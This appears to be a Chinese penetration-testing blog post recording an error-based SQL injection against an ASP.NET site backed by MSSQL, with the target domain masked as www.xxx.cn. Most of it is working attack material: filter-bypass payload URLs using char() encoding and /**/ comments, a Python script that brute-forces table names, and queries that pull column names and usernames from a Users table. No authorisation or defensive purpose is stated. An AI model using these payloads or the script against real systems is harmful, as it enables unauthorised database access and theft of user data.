首页 » NetworkSec » Penetration » 正文

又又一次mssql注入

记一次mssql注入历程

又一次mssql注入历程

 

0x00 爆数据库

过滤了单引号,空格等
利用char,0x绕过,注意%2b编码

http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,((select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=5)))–

 

 

0x01 爆表名

http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,(select/**/top/**/1/**/name/**/from/**/jy..sysobjects/**/where/**/xtype=0x75/**/and/**/name/**/not/**/in(char(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111))))–

写个脚本跑表

#coding:utf-8
#Author:LSA
import sys
import requests
from bs4 import BeautifulSoup
import re
headers = {
    'Cookie': '',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'
}
global tables_name
tables_name = "char(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)"
#print tables_name

def deal_table_name(table_name):
    xx = ''
    xxxx = ''
    for i in range(0,len(table_name)):
        xx = xx + str(ord(table_name[i])) + ' '
    print xx


    xxx = xx[:-1].split(' ')
    print xxx

    for i in range(0,len(xxx)):
        xxxx = xxxx + 'char(' + xxx[i] + ')' + '%2b'
    

    return xxxx[:-3]

def brute_tables(url):
    for i in range(0,300):
        url = 'http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,(select/**/top/**/1/**/name/**/from/**/jy..sysobjects/**/where/**/xtype=0x75/**/and/**/name/**/not/**/in(' + tables_name + ')))--'
        print url
        rsp = requests.get(url,headers=headers)
        soup = BeautifulSoup(rsp.text,"lxml")
        title = soup.title.string
        #print title
        table_name = re.findall(r"'(.*?)'",title)
        print table_name[0]
        table_name = deal_table_name(table_name[0])
        print table_name
        
        global tables_name
        tables_name = tables_name + ',' + table_name
        #print tables_name
    print tables_name
def main(url):
    brute_tables(url)
if __name__ == '__main__':
    url = 'http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,(select/**/top/**/1/**/name/**/from/**/jy..sysobjects/**/where/**/xtype=0x75/**/and/**/name/**/not/**/in(' + tables_name + ')))--'
    main(url)

0x02 爆列名

http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,(select/**/top/**/1/**/COLUMN_NAME/**/from/**/jy.information_schema.columns/**/where/**/TABLE_NAME=char(85)%2bchar(115)%2bchar(101)%2bchar(114)%2bchar(115)/**/and/**/COLUMN_NAME/**/not/**/in(char(73)%2bchar(100))))–

 

0x03 爆数据

http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,(select/**/top/**/1/**/username/**/from/**/Users))–

 

0x04 结语

在注入中要灵活运用数据库自带的表,比如mssql的sysobjects,information_schema,mysql的information_schema,oracle的dual,user_tables,all_objects,user_tab_columns,all_tab_columns,all_tables等等。

Comment

please input captcha *